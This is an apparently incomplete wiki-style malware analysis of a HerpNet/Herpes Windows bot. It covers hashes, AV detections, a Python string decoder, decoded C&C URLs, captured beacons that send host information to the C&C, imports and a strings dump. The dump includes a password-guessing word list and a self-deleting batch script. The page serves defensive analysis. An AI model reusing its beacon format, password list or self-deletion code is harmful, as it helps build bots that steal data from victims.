Db6779d497cb5e22697106e26eebfaa8

From aldeid
Jump to: navigation, search

Description

Summary

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Identification

MD5 db6779d497cb5e22697106e26eebfaa8
SHA1 006cd3dcd25cb7f675e27ebcdb983cc9949a0915
SHA256 7c42d0eef7e3d3fee08b327843426d69bd7d15fedd1b7ed5ed77c8c7391448d2
ssdeep 3072:a1OnnZnX3pJmmQpV11X9KReu8vLT2mj0U:a1mZnpJjQv1vKR/ULKY0
imphash 83f973d8d0ba495a78d06cadcbdccf72
File size 123.0 KB ( 125952 bytes )
File type Win32 EXE
Magic literal PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Antivirus detection

Antivirus Result Update
AVG Win32/DH{A2IeExQPJVd8fQ} 20140226
Ad-Aware Dropped:Generic.Keylogger.2.CD4EE167 20140226
Agnitum Worm.Autorun!DXYRzwHXKfI 20140225
AntiVir Worm/Autorun.adz.28 20140226
Antiy-AVL Trojan[:HEUR]/Win32.Unknown 20140226
Avast Win32:GaoBot-AOZ [Wrm] 20140226
BitDefender Dropped:Generic.Keylogger.2.CD4EE167 20140226
Bkav W32.SidleadD.Trojan 20140225
CAT-QuickHeal Worm.AutoRun 20140226
ClamAV Win.Trojan.Autorun-575 20140226
Comodo UnclassifiedMalware 20140226
DrWeb Trojan.DownLoad3.6574 20140226
ESET-NOD32 a variant of Win32/Agent.NKH 20140226
Emsisoft Dropped:Generic.Keylogger.2.CD4EE167 (B) 20140226
F-Secure Dropped:Generic.Keylogger.2.CD4EE167 20140226
Fortinet W32/HerpBot.B 20140226
GData Dropped:Generic.Keylogger.2.CD4EE167 20140226
Ikarus Trojan.Win32.Weelsof 20140226
Jiangmin Trojan/Generic.zklc 20140226
K7AntiVirus Riskware ( 0040eff71 ) 20140226
K7GW Riskware ( 0040eff71 ) 20140226
Kaspersky HEUR:Trojan.Win32.Generic 20140226
Kingsoft Win32.Troj.Undef.(kcloud) 20140226
Malwarebytes Backdoor.Bot 20140226
McAfee W32/Autorun.worm!pn 20140226
McAfee-GW-Edition W32/Autorun.worm!pn 20140226
MicroWorld-eScan Dropped:Generic.Keylogger.2.CD4EE167 20140226
Microsoft Worm:Win32/Autorun.ADZ 20140226
NANO-Antivirus Trojan.Win32.DownLoad3.wyuzx 20140226
Norman Malware 20140226
Panda Generic Worm 20140226
Qihoo-360 HEUR/Malware.QVM10.Gen 20140226
SUPERAntiSpyware Trojan.Agent/Gen-Autorun 20140226
Sophos Mal/HerpBot-B 20140226
Symantec Trojan.Gen.2 20140226
TheHacker Trojan/Agent.nkh 20140226
TrendMicro TROJ_AGENT_035820.TOMB 20140226
TrendMicro-HouseCall TROJ_AGENT_035820.TOMB 20140226
VBA32 suspected of Trojan.Downloader.gen.h 20140226
VIPRE Trojan.Win32.Generic!SB.0 20140226
ViRobot Worm.Win32.S.Autorun.125952.A 20140226
nProtect Dropped:Generic.Keylogger.2.CD4EE167 20140226
Baidu-International 20140226
CMC 20140220
Commtouch 20140226
F-Prot 20140226
Rising 20140226
TotalDefense 20140226

Malware analysis

Malware capabilities

Db6779d497cb5e22697106e26eebfaa8-threads.png

When it is run, the malware:

  • creates a mutex: "rffggghooo"
  • runs 3 threads:
    • Installs a persistence registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • Starts a keylogger
    • Contacts the C&C

Decode strings

Some strings are encoded:

.text:00406FE5                 mov     ecx, offset ValueName ; "tcerfhygy"
.text:00406FEA                 call    sub_403034
.text:00406FEF                 mov     ecx, offset szAgent ; "74978o6rpp6p19836n17n3p2pq0840o0"
.text:00406FF4                 call    sub_403034
.text:00406FF9                 mov     ecx, offset aUggcQq_mrebkpb ; "uggc://qq.mrebkpbqr.arg/urecarg/"
.text:00406FFE                 call    sub_403034
.text:00407003                 mov     ecx, offset aUggcJjj_mrebkp ; "uggc://jjj.mrebkpbqr.arg/urecarg/"
.text:00407008                 call    sub_403034
.text:0040700D                 mov     ecx, offset aUggcSex7_zvar_ ; "uggc://sex7.zvar.ah/urecarg/"
.text:00407012                 call    sub_403034
.text:00407017                 mov     ecx, offset aSgc_mrebkpbqr_ ; "sgc.mrebkpbqr.arg"
.text:0040701C                 call    sub_403034
.text:00407021                 mov     ecx, offset aH[email protected] ; "[email protected]"
.text:00407026                 call    sub_403034
.text:0040702B                 mov     ecx, offset aHccvg ; "hccvg"
.text:00407030                 call    sub_403034

The sub_403034 function decodes these strings:

Db6779d497cb5e22697106e26eebfaa8-decode-function.png

From this function, we can write a python script that will decode the strings (taken from http://code.google.com/p/malware-lu/wiki/en_analyse_herpnet#Decode_strings)

#!/usr/bin/env python
import sys

def decode(src):
    r = ""
    for c in src:
        c = ord(c)
        if  c < 0x61 or c > 0x7a :
            if c < 0x41 or c > 0x5a:
                r += chr(c)
                continue
            x = (( c - 0x41 ) % 0x1a) + 0x41
        else:
            x = ((c - 0x54) % 0x1a) + 0x61

        r += chr(x)
    return r

def main():
    if len(sys.argv) != 2:
            sys.exit(1)

    f = open(sys.argv[1], 'rb')

    f.seek(0x1ae88, 0)
    data = f.read(0x32f) 
    for d in data.split("\0"):
        if len(d) == 0:
            continue
        print "%s : %s" % (d, decode(d))

if __name__ == "__main__":
    main()

Here are the decoded strings;

$ python decode.py db6779d497cb5e22697106e26eebfaa8.exe
tcerfhygy : gpresultl
3.0 : 3.0
uggc://qq.mrebkpbqr.arg/urecarg/ : http://dd.zeroxcode.net/herpnet/
74978o6rpp6p19836n17n3p2pq0840o0 : 74978b6ecc6c19836a17a3c2cd0840b0
uggc://jjj.mrebkpbqr.arg/urecarg/ : http://www.zeroxcode.net/herpnet/
sgc.mrebkpbqr.arg : ftp.zeroxcode.net
uggc://sex7.zvar.ah/urecarg/ : http://frk7.mine.nu/herpnet/
[email protected] : [email protected]
hccvg : uppit
ujsdsdbbngfgjhhuugfgfujd : hwfqfqooatstwuuhhtstshwq
rffggghooo : esstttubbb
Ashfurncsmx : Afusheapfzk

Artifacts

Network indicators

GET request

GET /herpnet/support/index.php?miner HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: dd.zeroxcode.net
Connection: Keep-Alive

POST request

POST /herpnet/run.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: 74978b6ecc6c19836a17a3c2cd0840b0
Host: dd.zeroxcode.net
Content-Length: 606
Connection: Keep-Alive
Cache-Control: no-cache

[email protected]&admin=true&os=Windows XP Professional Service Pack 3&hwid=358ee27fa32f61e60c70c84b867cec7a&ownerid=2055&version=3.0&raminfo=Total: 1.00GB | Used: 0.41GB&cpuinfo=       Intel(R) Core(TM) i7-2620M CPU @ 2.70GHz x86 Family 6 Model 42 Stepping 7&hdiskinfo=Total: 19.99GB | Used: 12.38GB&awindow=Resource Hacker  -  C:\Documents and Settings\malware\Bureau\db6779d497cb5e22697106e26eebfaa8.exe&uptime=0 Weeks, 0 Days, 0 Hours, 24 Minutes, 2 Seconds&mining=Disabled&pinfo=6861 Handles | 32 Processes | 349 Threads&vidinfo=VMware SVGA II&laninfo=malware-418ee9f | 192.168.102.129

Following parameters are disclosed:

Parameter Value Description
userandpc [email protected] Logged in user
admin true Is logged in used admin?
os Windows XP Professional Service Pack 3 Version of the OS
hwid 358ee27fa32f61e60c70c84b867cec7a Hardware ID
ownerid 2055 Owner ID
version 3.0 Version?
raminfo Total: 1.00GB | Used: 0.41GB RAM usage information
cpuinfo Intel(R) Core(TM) i7-2620M CPU @ 2.70GHz x86 Family 6 Model 42 Stepping 7 CPU information
hdiskinfo Total: 19.99GB | Used: 12.38GB Hard disk information
awindow Resource Hacker - C:\Documents and Settings\malware\Bureau\db6779d497cb5e22697106e26eebfaa8.exe Running GUI-based applications
uptime 0 Weeks, 0 Days, 0 Hours, 24 Minutes, 2 Seconds Uptime
mining Disabled ?
pinfo 6861 Handles | 32 Processes | 349 Threads Processes information
vidinfo VMware SVGA II Graphical card information
laninfo malware-418ee9f | 192.168.102.129 LAN information

Files

The malware creates files in following directories:

  • C:\Documents and Settings\malware\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1275210071-484763869-842925246-1003\3310a4fa6cb9c60504498d7eea986fc2_b4e9b268-bf8d-46b9-b002-800837c6c55b
  • C:\Documents and Settings\malware\Application Data\Microsoft\Protect\S-1-5-21-1275210071-484763869-842925246-1003\37a19e89-4680-454c-bd07-1245371bea17

It copies itself in:

  • C:\Documents and Settings\malware\Application Data\gpresultl.exe

It creates a log file:

  • C:\Documents and Settings\malware\Application Data\log.err

It creates following file:

  • C:\WINDOWS\system32\d3d9caps.dat

Registry

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Mutexes

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Static analysis

Sections

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
.text      0x1000       0x1373b      0x13800      6.588646    
.injcd     0x15000      0x38b        0x400        4.056263    
.rdata     0x16000      0x5f38       0x6000       5.265040    
.data      0x1c000      0x6f00       0x2000       3.174315    
.rsrc      0x23000      0x4cc        0x600        4.472377    
.reloc     0x24000      0x24d2       0x2600       4.619798

Resources

Name               RVA      Size     Lang         Sublang                  Type
--------------------------------------------------------------------------------
RT_MENU            0x23178  0x56     LANG_ITALIAN SUBLANG_ITALIAN          data
RT_DIALOG          0x231d0  0x14c    LANG_ITALIAN SUBLANG_ITALIAN          data
RT_STRING          0x2331c  0x44     LANG_ITALIAN SUBLANG_ITALIAN          data
RT_ACCELERATOR     0x23360  0x10     LANG_ITALIAN SUBLANG_ITALIAN          data
RT_MANIFEST        0x23370  0x15a    LANG_ENGLISH SUBLANG_ENGLISH_US       ASCII text, with CRLF line terminators

IAT

ADVAPI32

  • CryptReleaseContext
  • RegCloseKey
  • AdjustTokenPrivileges
  • GetUserNameA
  • RegDeleteValueA
  • RegCreateKeyExA
  • LookupPrivilegeValueA
  • LookupAccountSidA
  • RegQueryValueExA
  • RegSetValueExA
  • GetTokenInformation
  • OpenProcessToken
  • CryptAcquireContextA
  • RegOpenKeyExA
  • AllocateAndInitializeSid
  • CryptCreateHash
  • FreeSid
  • CheckTokenMembership
  • CryptDestroyHash
  • CryptHashData
  • CryptGetHashParam

GDI32

  • DeleteDC
  • CreateDIBSection
  • GetDeviceCaps
  • DeleteObject
  • SelectObject
  • CreateCompatibleDC
  • SaveDC
  • RestoreDC
  • BitBlt

KERNEL32

  • lstrcpyA
  • CreateFileA
  • GetFileSize
  • lstrcmpA
  • SetFilePointer
  • HeapAlloc
  • HeapFree
  • GetProcessHeap
  • WriteFile
  • GetVolumeInformationA
  • Sleep
  • ReadFile
  • lstrcmpiA
  • CopyFileA
  • SetFileAttributesA
  • GetModuleFileNameA
  • CloseHandle
  • DeleteFileA
  • CreateThread
  • HeapCreate
  • FlushFileBuffers
  • GetSystemTime
  • ExitProcess
  • SetErrorMode
  • GetCurrentProcess
  • Process32First
  • VirtualFree
  • CreateRemoteThread
  • OpenProcess
  • TerminateProcess
  • MultiByteToWideChar
  • CreateDirectoryA
  • GetLastError
  • EnterCriticalSection
  • VirtualAllocEx
  • OpenMutexA
  • Process32Next
  • GetModuleHandleA
  • GetTempPathA
  • CreateToolhelp32Snapshot
  • WriteProcessMemory
  • GetComputerNameA
  • GetEnvironmentVariableA
  • GlobalMemoryStatusEx
  • GetSystemInfo
  • GetDiskFreeSpaceExA
  • GetVersionExA
  • GetSystemTimeAsFileTime
  • GetCurrentProcessId
  • QueryPerformanceCounter
  • DeleteCriticalSection
  • GetFileType
  • InitializeCriticalSectionAndSpinCount
  • SetHandleCount
  • GetEnvironmentStringsW
  • FreeEnvironmentStringsW
  • GetModuleFileNameW
  • InterlockedDecrement
  • GetCurrentThreadId
  • SetLastError
  • InterlockedIncrement
  • TlsFree
  • TlsSetValue
  • TlsGetValue
  • TlsAlloc
  • GetModuleHandleW
  • HeapSize
  • IsProcessorFeaturePresent
  • IsDebuggerPresent
  • SetUnhandledExceptionFilter
  • UnhandledExceptionFilter
  • RaiseException
  • GetStartupInfoW
  • HeapSetInformation
  • GetCommandLineA
  • DecodePointer
  • EncodePointer
  • LoadLibraryW
  • RtlUnwind
  • GetStringTypeW
  • lstrcatA
  • GetTickCount
  • lstrlenA
  • LoadLibraryA
  • GetProcAddress
  • FreeLibrary
  • HeapReAlloc
  • LeaveCriticalSection
  • CreateMutexA
  • GetConsoleCP
  • GetConsoleMode
  • SetStdHandle
  • GetCPInfo
  • GetACP
  • GetOEMCP
  • IsValidCodePage
  • WideCharToMultiByte
  • LCMapStringW
  • WriteConsoleW
  • VirtualAlloc
  • CreateFileW
  • GetStdHandle

SHELL32

  • SHGetFolderPathA
  • SHGetSpecialFolderPathA
  • ShellExecuteA

USER32

  • GetWindowDC
  • PostQuitMessage
  • LoadStringA
  • LoadIconA
  • BeginPaint
  • TranslateMessage
  • MessageBoxA
  • CreateWindowExA
  • TranslateAcceleratorA
  • RegisterClassExA
  • DefWindowProcA
  • LoadAcceleratorsA
  • DispatchMessageA
  • UpdateWindow
  • LoadCursorA
  • DialogBoxParamA
  • GetKeyState
  • GetForegroundWindow
  • GetWindowTextA
  • GetAsyncKeyState
  • MapVirtualKeyA
  • wvsprintfA
  • wsprintfA
  • GetMessageA
  • DestroyWindow
  • SwapMouseButton
  • EndPaint
  • GetSystemMetrics
  • EndDialog

WININET

  • InternetCloseHandle
  • InternetOpenA
  • HttpSendRequestA
  • HttpAddRequestHeadersA
  • HttpOpenRequestA
  • InternetSetOptionA
  • InternetReadFile
  • InternetQueryDataAvailable
  • InternetConnectA

WS2_32

  • gethostbyname
  • WSAStartup
  • gethostname
  • inet_ntoa

d3d9

  • Direct3DCreate9

gdiplus

  • GdipAlloc
  • GdipFree
  • GdiplusShutdown
  • GdipGetImageEncodersSize
  • GdipDisposeImage
  • GdipCreateBitmapFromHBITMAP
  • GdipSaveImageToFile
  • GdipCloneImage
  • GdiplusStartup
  • GdipGetImageEncoders

Strings

PSUVW
t$$j
Y_^][
t:Wj
@PSV
= bA
hXBA
SPhh
NSQhh
PQVW
u	j>
=pbA
D$$S
9|$$r
SVW3
=``A
=X`A
=X`A
VVVh`
PPPh`
VVVh
SSSh
PSSh
VVVh
@PSSSh
PSShd
Y_^[
EpSP
SSSj
SSjP
EpQPh
Y_^[
SSRQS
E$Sh
SWWP
SSSShT
SSjP
SVWPj
=(`A
QRVj
SVWj
SVW3
8_^3
h(CA
SVWP
Y_^[
SVWP
udhX
Y_^[
SVWP
SSQP
Y_^[
h`DA
SVWP
8"t"h
tP9u
Y_^[
PQVW
SVWh
SVWP
Y_^[
hRFA
SVWP
Y_^[
SVWjW
T$Tj
T$TR
L$DRPQ
PQSV
Php/@
=4bA
jdhx
58bA
L$H3
L$H3
QRPV
L$H3
ht*Ht
L$H3
VjgQ
L$L^3
t&Hu
AQWV
AQWV
AQWV
uYjY
PSSSSSSh 
50`A
u/j j
5P`A
5 `A
5 `A
uJjd
h'GA
^[_3
YQPVh
woVW
oV f
o^0f
[email protected]
onPf
ov`f
o~pf
FGIu
X^_]
FGIu
u,9E
h,dA
h8cA
h cA
uTVWh
Y__^[
9csm
hDdA
WhDdA
htdA
hhdA
h`dA
5xaA
t&:a
^_[3
=paA
5paA
_^[]
5daA
to=(
Y_^[]
Fpt"
PPPPP
9]$u
9](SS
t"SS9] u
 SW3
8csm
hlrA
PPPPP
<v*V
hdrA
h\rA
^SSSSS
t$<"u	3
t?VSP
Y[_^
PPPPP
>"u&
< tK<	tG
wf93t
f90u
f90u
VVV+
@PSVV
t*VV
[email protected] ^V
SWf9M
[email protected] 
j h8
t!Ht
_^[]
Y_^[
Y_^[
URPQQhp
L$,3
UVWS
[_^]
SVWj
_^[]
9] SS
v4;5\
vL;5t
PPPPPPPP
PPPPPPPP
VVhU
QSWVj
v	N+D$
@u^V
t$HHt
HHtYHHt
HHty+
RPSW
90tX
u}hX
_^[]
t'Ou
SVWUj
]_^[
;t$,v-
UQPXY]Y[
_^[]
~%9M
QVj	
r 8^
~,WPV
98t^
tVPV
t/9U
QQSVWd
QSVW
Y__^[
80t/
PPPPP
SQRP
jdRP
@PVS
@PVS
Wj0S
|-;E
VVVVV
@_^]
=RCC
=MOC
=csm
8csm
9csm
~SSV
j,h0
~A;L
>csm
taSV
YYPV
t)SV
Hu4j
=MOC
t*=RCC
;7|G;p
9>u&
tR99u2
r,9Y
@_^[]
SSSSW
SSSSW
@PWV
_^[]
PPPPP
WVU3
v	N+D$
r"9U
r"9U
9M$u
<+t"<-t
+t HHt
PPPPP
u"9U
u	9p
u	9E
;9u	
0K;]
@tH9
Unknown exception
bad allocation
CorExitProcess
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
 !"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`abcdefghijklmnopqrstuvwxyz{|}~
(null)
( 8PX
700WP
`h````
xpxxxx
 Complete Object Locator'
 Class Hierarchy Descriptor'
 Base Class Array'
 Base Class Descriptor at (
 Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
 delete[]
 new[]
`local vftable constructor closure'
`local vftable'
`RTTI
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
 delete
 new
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
 !"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
('8PW
700PP
`h`hhh
xppwpp
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
kernel32.dll
lstrcpyA
lstrlenA
lstrcmpA
lstrcatA
Sleep
GetLocaleInfoA
CreateThread
GetTickCount
CreateMutexA
GetLastError
GetModuleHandleA
CloseHandle
CreateFileA
WriteFile
GetFileAttributesA
ExpandEnvironmentStringsA
GetModuleFileNameA
CopyFileA
GetDriveTypeA
SetFileAttributesA
DeleteFileA
CreateToolhelp32Snapshot
Process32First
Process32Next
OpenProcess
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
GetCurrentProcess
TerminateThread
GetFileSizeEx
LoadLibraryA
GetProcAddress
VirtualProtect
VirtualProtectEx
FindFirstFileA
FindNextFileA
FindClose
GetLogicalDriveStringsA
LocalFree
ReadFile
CreateProcessA
TerminateProcess
GetModuleFileNameExA
Thread32First
Thread32Next
OpenThread
ResumeThread
SuspendThread
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegSetValueExA
RegCloseKey
RegDeleteValueA
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
CredEnumerateA
CredFree
RegEnumValueA
CryptAcquireContextA
CryptHashData
CryptGetHashParam
CryptDestroyHash
CryptReleaseContext
CryptCreateHash
ws2_32.dll
WSACleanup
WSAStartup
connect
closesocket
getaddrinfo
send
recv
socket
inet_addr
htonl
htons
WSASocketA
setsockopt
sendto
inet_ntoa
ioctlsocket
wininet.dll
InternetOpenA
InternetOpenUrlA
InternetReadFile
InternetCloseHandle
InternetConnectA
FtpPutFileA
urlmon.dll
ObtainUserAgentString
shell32.dll
ShellExecuteA
user32.dll
RegisterDeviceNotificationA
CreateWindowExA
RegisterClassExA
DefWindowProcA
GetMessageA
TranslateMessage
DispatchMessageA
PeekMessageA
MessageBoxA
wsprintfA
SetClipboardData
OpenClipboard
EmptyClipboard
CloseClipboard
SetForegroundWindow
SetFocus
ShowWindow
keybd_event
BlockInput
VkKeyScanA
pdh.dll
PdhAddCounterA
PdhCollectQueryDataA
PdhGetFormattedCounterValue
PdhOpenQueryA
Ole32.dll
CoInitialize
CoCreateInstance
CoUninitialize
Crypt32.dll
CryptUnprotectData
oleaut32.dll
VariantInit
psapi.dll
shlwapi.dll
PathRemoveFileSpecA
winmm.dll
mciSendStringA
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
string too long
invalid string position
%s%d%d%d%d.%s
ERROR
AV_keygen.exe
music.exe
view.exe
readme.exe
drivers.com
rar_driver.com
Autorun.exe
Keygen.exe
WinRAR_Update.exe
verify.exe
RAR_Update.exe
AutoExtract.exe
OpenRAR.exe
Extract.exe
extract.com
start
testing
abcde
apple
apollo13
123abc
abcd
2000
2004
2005
2006
system
hacker
boss
intranet
hell
siemens
nokia
mysql
oracle
sexy
test
user
winpass
winnt
win95
win98
win2k
win2000
pass1234
pass
linux
loginpass
login
server
home
database
data
bitch
winxp
internet
billy
command
access
1234567890
123456789
12345678
1234567
123456
12345
1234
awerty
qwerty
default
wwwadmin
computer
owner
root
guest
amministratore
administrator
admins
admin
<END>
HSupport\
open
Sh1tInserthere
84571235741.exe
URLDownloadToFileA
URLMON.DLL
SHELL32.DLL
CoInitializeEx
OLE32.DLL
GetTempPathA
SetFilePointer
KERNEL32.DLL
system.lho
[BSPACE]
[TAB]
[ENTER]
[CTRL]
[ALT]
[PAUSE]
[ESC]
[PGUP]
[PGDOWN]
[END]
[LEFT]
[UP]
[RIGHT]
[DOWN]
[STAMP]
[INS]
[DEL]
[HOME]
[MENU]
[F1]
[F2]
[F3]
[F4]
[F5]
[F6]
[F7]
[F8]
[F10]
[F11]
[F12]
[+] Window: %s [%02u/%02u/%u %02u:%02u:%02u]
7zdll
utorrent
miner
7z.dll
7z.exe
utorrent.exe
miner.exe
screen.jpg
log.err
"%s"
Software\Microsoft\Windows\CurrentVersion\Run
delStartup(): RegCreateKeyExA Failed, GetLastError() = %d
Software\HSetting\
pool
saveMinerURL(): RegCreateKeyExA Failed, GetLastError() = %d
NOTFOUND
getID(): RegCreateKeyEx() failed, GetLastError = %d
setID(): RegCreateKeyEx() failed, GetLastError = %d
http://
isExe(): CreateFile() failed, GetLastError = %d
isExe(): ReadFile() failed, GetLastError = %d
uploads/uppit.php
---------------------------autoupdater
Host: 
Content-Type: multipart/form-data; boundary=
HTTP/1.0
POST
--%s
Content-Disposition: form-data; name="upfile"; filename="%s"
Content-Type: application/octet-stream
username
password
Content-type: application/x-www-form-urlencoded
Content-type: text/html
doReq(): HttpSendRequest() Failed, GetLastError = %d
doReq(): HttpOpenRequest() Failed, GetLastError = %d
doReq(): InternetConnect() Failed, GetLastError = %d
doReq(): InternetOpen() Failed, GetLastError = %d
\uTorrent\uTorrent.exe
\BitTorrent\BitTorrent.exe
%s%ul
GetAsyncKeyState
WaitForSingleObject
OpenEventA
ReleaseMutex
OpenMutexA
dwTotalP < 1
SeDebugPrivilege
.exe
chrome.exe
DownloadSupportFiles(): Failed to create the directory
support/index.php?
DownloadSupportFiles(): Failed to download the test file. Exiting.
DownloadSupportFiles(): Failed to download %s
Active
Disabled
/NOINSTALL /HIDE /DIRECTORY tmdl 
http://%s
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
reqPage(): HttpSendRequest() Failed, GetLastError = %d
reqPage(): HttpOpenRequest() Failed, GetLastError = %d
reqPage(): InternetConnect() Failed, GetLastError = %d
reqPage(): InternetOpen() Failed, GetLastError = %d
userandpc=%s&admin=%s&os=%s&hwid=%s&ownerid=%s&version=%s&raminfo=%s&cpuinfo=%s&hdiskinfo=%s&awindow=%s&uptime=%s&mining=%s&pinfo=%s&vidinfo=%s&laninfo=%s
%s&id=%s
%srun.php
%s\removeMe%i%i%i%i.bat
@echo off
:Repeat
del "%s">nul
ping 0.0.0.0>nul
if exist "%s" goto Repeat
del "%%0"
exCommand(): Command integrity check failed
exCommand() id section: Empty id
Internet Explorer\iexplore.exe
torrent
set cdaudio door open
set cdaudio door closed
Information
2055
GetNativeSystemInfo
Windows Vista 
Windows Server 2008 
Windows 7 
Windows Server 2008 R2 
GetProductInfo
Ultimate
Professional
Home
Home Basic
Enterprise
Unknown
Windows Server 2003 R2, 
Windows Storage Server 2003
Windows Home Server
Windows XP Professional x64
Windows Server 2003 
Windows XP 
Windows 2000 
Datacenter Server
Advanced Server
Server
 x64
true
false
%[email protected]%s
[email protected]
Container
%02x
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductId
BuildLab
%s%d
HOMEDRIVE
%s%u
ADVAPI32.DLL
GetCurrentHwProfileA
%s%u%s%s
Total: %.2fGB | Used: %.2fGB
Unable to obtain CPU infos.
HARDWARE\DESCRIPTION\System\CentralProcessor\0
~MHz
Identifier
ProcessorNameString
VendorIdentifier
%s %s
%s | %s
GetPerformanceInfo
%u Handles | %u Processes | %u Threads
%d Weeks, %d Days, %d Hours, %d Minutes, %d Seconds
%s -f -t 10 -c %s
%s -f -t 0
shutdown.exe
e+000
bad exception
1#QNAN
1#INF
1#IND
1#SNAN
RSDS
;&z9LH
C:\Documents and Settings\Frk7\Desktop\Nohrpmeplease\h3rpes\Herpes4\Release\Herpes.pdb
Direct3DCreate9
d3d9.dll
WS2_32.dll
GdiplusShutdown
GdipFree
GdipAlloc
GdipGetImageEncodersSize
GdipDisposeImage
GdipCreateBitmapFromHBITMAP
GdipGetImageEncoders
GdipSaveImageToFile
GdipCloneImage
GdiplusStartup
gdiplus.dll
FreeLibrary
GetProcAddress
LoadLibraryA
lstrlenA
GetTickCount
lstrcatA
GetTempPathA
lstrcpyA
CreateFileA
GetFileSize
lstrcmpA
SetFilePointer
HeapAlloc
HeapFree
GetProcessHeap
WriteFile
GetVolumeInformationA
Sleep
ReadFile
lstrcmpiA
CopyFileA
SetFileAttributesA
GetModuleFileNameA
CloseHandle
DeleteFileA
CreateThread
HeapCreate
FlushFileBuffers
GetSystemTime
ExitProcess
SetErrorMode
GetCurrentProcess
Process32First
VirtualFree
CreateRemoteThread
OpenProcess
TerminateProcess
MultiByteToWideChar
CreateDirectoryA
GetLastError
VirtualAlloc
VirtualAllocEx
OpenMutexA
Process32Next
GetModuleHandleA
CreateMutexA
CreateToolhelp32Snapshot
WriteProcessMemory
GetComputerNameA
GetEnvironmentVariableA
GlobalMemoryStatusEx
GetSystemInfo
GetDiskFreeSpaceExA
GetVersionExA
KERNEL32.dll
InternetConnectA
InternetQueryDataAvailable
InternetReadFile
InternetSetOptionA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
WININET.dll
wsprintfA
wvsprintfA
MapVirtualKeyA
GetAsyncKeyState
GetWindowTextA
GetForegroundWindow
GetKeyState
DialogBoxParamA
LoadCursorA
UpdateWindow
DispatchMessageA
LoadAcceleratorsA
DefWindowProcA
EndDialog
TranslateAcceleratorA
CreateWindowExA
MessageBoxA
TranslateMessage
BeginPaint
LoadIconA
LoadStringA
GetWindowDC
PostQuitMessage
RegisterClassExA
GetMessageA
DestroyWindow
SwapMouseButton
EndPaint
GetSystemMetrics
USER32.dll
RestoreDC
SaveDC
CreateCompatibleDC
SelectObject
DeleteObject
GetDeviceCaps
CreateDIBSection
DeleteDC
BitBlt
GDI32.dll
OpenProcessToken
GetTokenInformation
RegSetValueExA
RegQueryValueExA
LookupAccountSidA
LookupPrivilegeValueA
RegCreateKeyExA
RegDeleteValueA
GetUserNameA
AdjustTokenPrivileges
RegCloseKey
CryptGetHashParam
CryptReleaseContext
CryptAcquireContextA
RegOpenKeyExA
AllocateAndInitializeSid
CryptCreateHash
FreeSid
CheckTokenMembership
CryptDestroyHash
CryptHashData
ADVAPI32.dll
SHGetSpecialFolderPathA
ShellExecuteA
SHGetFolderPathA
SHELL32.dll
EncodePointer
DecodePointer
GetCommandLineA
HeapSetInformation
GetStartupInfoW
RaiseException
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
IsProcessorFeaturePresent
HeapSize
GetModuleHandleW
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
InterlockedIncrement
SetLastError
GetCurrentThreadId
InterlockedDecrement
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
WideCharToMultiByte
LCMapStringW
GetStdHandle
GetModuleFileNameW
FreeEnvironmentStringsW
GetEnvironmentStringsW
SetHandleCount
InitializeCriticalSectionAndSpinCount
GetFileType
DeleteCriticalSection
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
HeapReAlloc
LeaveCriticalSection
EnterCriticalSection
LoadLibraryW
RtlUnwind
GetStringTypeW
GetConsoleCP
GetConsoleMode
SetStdHandle
WriteConsoleW
CreateFileW
[email protected]@@
[email protected]@@
[email protected]@@
[email protected]@
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
